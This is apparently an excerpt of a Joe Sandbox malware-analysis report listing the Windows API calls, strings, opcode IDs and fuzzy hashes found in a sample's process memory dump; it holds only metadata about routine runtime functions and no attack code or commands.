                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 14448e1e65947dbc06f9c561fc5aab0a4ceebeddc3d5721b90f796f7e2f78561
                                                                                                      • Instruction ID: 4551206159b4dc9a26ebe5064ae89363a56d503200dc6de1e30a2f919bbea4f5
                                                                                                      • Opcode Fuzzy Hash: 14448e1e65947dbc06f9c561fc5aab0a4ceebeddc3d5721b90f796f7e2f78561
                                                                                                      • Instruction Fuzzy Hash: 1EF05E3351010DBBEF119E96DC01DEF3BADEFCA334F205155F918A2061DA76EA21A7A1
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • _free.LIBCMT ref: 00EA766A
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 314386986-0
                                                                                                      • Opcode ID: d58a5d752df34cb8591b035e1fcee0776572abf69335ca5a2c850e8c226de301
                                                                                                      • Instruction ID: defb828baa61e9c4d31d3047c1256d8cc21f2d25493aee1fdc4ab3c0841cafe9
                                                                                                      • Opcode Fuzzy Hash: d58a5d752df34cb8591b035e1fcee0776572abf69335ca5a2c850e8c226de301
                                                                                                      • Instruction Fuzzy Hash: 71F096B10057048FD334DF14D885752B7F8EB49715F10882EE29A9BA91D774B844CB94
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 09081276912ca74e9190e5fa33041e9c777b3e1642078f1db71b95545b207613
                                                                                                      • Instruction ID: ae02063a024b60aaf15a77d8e528d513e2ce592ceb2ba1c3f33af2922fbfb48b
                                                                                                      • Opcode Fuzzy Hash: 09081276912ca74e9190e5fa33041e9c777b3e1642078f1db71b95545b207613
                                                                                                      • Instruction Fuzzy Hash: B2E0E5221001156BEA3237268C84BAF3A8C9F4B3A4F1D2120AD54FE490CB90FC8081E0
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E8283B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: fe0a313091af9978a2c7f6f323d4acc5230750c52c5440a99524e1847d91aaf4
                                                                                                      • Instruction ID: 78a4be58848920b92632af20259d1d9a848130ba7973eafb554f111f07edc214
                                                                                                      • Opcode Fuzzy Hash: fe0a313091af9978a2c7f6f323d4acc5230750c52c5440a99524e1847d91aaf4
                                                                                                      • Instruction Fuzzy Hash: 6AE0DFB11000000ADB0CB330885A55E62C18B10365B64A67DE22EE61A1D720C8518300
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000002,00000002), ref: 00E31040
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00E9CD26
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1353095263-0
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00E3FDCD,?,AB1AAB9C), ref: 00E8BB6E
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      APIs
                                                                                                      • CreateEventW.KERNEL32 ref: 00E33C0C
                                                                                                      • GetLastError.KERNEL32 ref: 00E33C18
                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E33C4D
                                                                                                      • GetLastError.KERNEL32 ref: 00E33C5A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E33C65
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?), ref: 00E33D5E
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E33D67
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000,?,?,?), ref: 00E33D7E
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,00000000,00000000,?,?,?), ref: 00E33D8B
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?), ref: 00E33D96
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E33DA6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?), ref: 00E33DBE
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?), ref: 00E33DC3
                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?), ref: 00E33DC9
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CreateErrorEventLastWait$CriticalDeleteMultipleObjectObjectsQueueSectionSingleTerminateThreadUser
                                                                                                      • String ID: @a$event$mutex
                                                                                                      • API String ID: 55513473-2067588630
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00EAE1C1,?,00000000), ref: 00EADF34
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00EAE1C1,?,00000000), ref: 00EADF5D
                                                                                                      • GetACP.KERNEL32(?,?,00EAE1C1,?,00000000), ref: 00EADF72
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00EA202F,?,?,?,?,?,?,00000004), ref: 00EAD806
                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EA202F,?,?,?,?,?,?,00000004), ref: 00EAD818
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00EAD8A8
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00EAD8B6
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00EA202F,00000000,00EA214F), ref: 00EAD959
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                      • String ID:
                                                                                                      • API String ID: 4147378913-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                        • Part of subcall function 00EA43FF: _free.LIBCMT ref: 00EA445A
                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00EAE182
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00EAE1DD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00EAE1EC
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,00EA2028,00000040,?,00EA2148,00000055,00000000,?,?,00000055,00000000), ref: 00EAE234
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00EA20A8,00000040), ref: 00EAE253
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213562535-0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(AB1AAB9C,?,?), ref: 00E78068
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(00000000,00000000), ref: 00E783E0
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCloseCryptErrorLastProvider
                                                                                                      • String ID: operation failed with error $OS_Rng:
                                                                                                      • API String ID: 3861079404-700108173
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E8E4ED
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E8E5B9
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E8E5D9
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00E8E5E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 212b7e0f5dc537fea115c8ab714a430fb8cf15e029ab8fd80be336d7a49be69d
                                                                                                      • Instruction ID: 288f5865e7aae6e92c5ac921378828ff8f5b6d2bf60284dc7f73958f42e1b0d0
                                                                                                      • Opcode Fuzzy Hash: 212b7e0f5dc537fea115c8ab714a430fb8cf15e029ab8fd80be336d7a49be69d
                                                                                                      • Instruction Fuzzy Hash: C4311AB5D45218DBDB20EFA5D949BCDBBF8AF08304F1041AAE40CB7250EB715A898F45
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E784E0: __Mtx_unlock.LIBCPMT ref: 00E78584
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,?,?,00000000,AB1AAB9C), ref: 00E7845C
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00E7848B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptErrorLastMtx_unlockRandom
                                                                                                      • String ID: BCryptGenRandom
                                                                                                      • API String ID: 3936926508-3013187443
                                                                                                      • Opcode ID: ffe4dc1d295de10d3332506869bc99db865bbf6502d5468f887264c83ff6a338
                                                                                                      • Instruction ID: a3539f5be90f1e8894878ab17fa6613b2d94506ca767853b5c5dc054aba9abc3
                                                                                                      • Opcode Fuzzy Hash: ffe4dc1d295de10d3332506869bc99db865bbf6502d5468f887264c83ff6a338
                                                                                                      • Instruction Fuzzy Hash: 03113071940218AFCB14EFA0CD4AFDEB7BCFB14714F005569B919B7291EF7465048B50
                                                                                                      APIs
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000), ref: 00E78403
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCloseCryptProvider
                                                                                                      • String ID:
                                                                                                      • API String ID: 3378198380-0
                                                                                                      • Opcode ID: ce8939e481e442486165d2cddd7567d575ee481311f69f4de63c90909c06316a
                                                                                                      • Instruction ID: 750c54d10ea4b1a275395c790a4beb4a49b173441b91df7ef7674831248bae57
                                                                                                      • Opcode Fuzzy Hash: ce8939e481e442486165d2cddd7567d575ee481311f69f4de63c90909c06316a
                                                                                                      • Instruction Fuzzy Hash: 15D05B7178431111E22065145D05B8B56C85F61705F04D419F58CB63C1DAF0DC4043A5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E8CE9C
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E8CEAA
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E8CEBB
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E8CECC
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E8CEDD
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E8CEEE
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00E8CEFF
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E8CF10
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00E8CF21
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E8CF32
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E8CF43
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E8CF54
                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E8CF65
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E8CF76
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E8CF87
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E8CF98
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E8CFA9
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E8CFBA
                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00E8CFCB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00E8CFDC
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00E8CFED
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00E8CFFE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00E8D00F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00E8D020
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00E8D031
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00E8D042
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E8D053
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00E8D064
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E8D075
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E8D086
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00E8D097
                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E8D0A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00E8D0B9
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E8D0CA
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00E8D0DB
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00E8D0EC
                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00E8D0FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00E8D10E
                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00E8D11F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00E8D130
                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00E8D141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                      • API String ID: 667068680-295688737
                                                                                                      • Opcode ID: abe0a0fca2937ff2659bcb90fc0afee082ef08f8008d68d3ca7543cb26e7ef87
                                                                                                      • Instruction ID: 9c9628c23662732de6b09fc167907a429a58418528dfb66c9413053109a6e9a8
                                                                                                      • Opcode Fuzzy Hash: abe0a0fca2937ff2659bcb90fc0afee082ef08f8008d68d3ca7543cb26e7ef87
                                                                                                      • Instruction Fuzzy Hash: 19618C7195A359EFC7006FBAAE4DE673EA8BB0D701304161EB2A5F6170E7F580198F50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                                                                                      • String ID:
                                                                                                      • API String ID: 1186856153-0
                                                                                                      • Opcode ID: cfd7eb4750c443d5765b65ad6a5a08d123359f9a5947bc7468d6e680faeb30f9
                                                                                                      • Instruction ID: dbc31d95b790fd245e84aa93e7efafa24ff76101cb83fa25f7d8d57f698e8939
                                                                                                      • Opcode Fuzzy Hash: cfd7eb4750c443d5765b65ad6a5a08d123359f9a5947bc7468d6e680faeb30f9
                                                                                                      • Instruction Fuzzy Hash: 64C17172900608AFCF15DFA4D996AED7BF4EB08300F14655EF616BB291EB309A85CB50
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00EACD5B
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0CC
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0DE
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC0F0
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC102
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC114
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC126
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC138
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC14A
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC15C
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC16E
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC180
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC192
                                                                                                        • Part of subcall function 00EAC0AF: _free.LIBCMT ref: 00EAC1A4
                                                                                                      • _free.LIBCMT ref: 00EACD50
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EACD72
                                                                                                      • _free.LIBCMT ref: 00EACD87
                                                                                                      • _free.LIBCMT ref: 00EACD92
                                                                                                      • _free.LIBCMT ref: 00EACDB4
                                                                                                      • _free.LIBCMT ref: 00EACDC7
                                                                                                      • _free.LIBCMT ref: 00EACDD5
                                                                                                      • _free.LIBCMT ref: 00EACDE0
                                                                                                      • _free.LIBCMT ref: 00EACE18
                                                                                                      • _free.LIBCMT ref: 00EACE1F
                                                                                                      • _free.LIBCMT ref: 00EACE3C
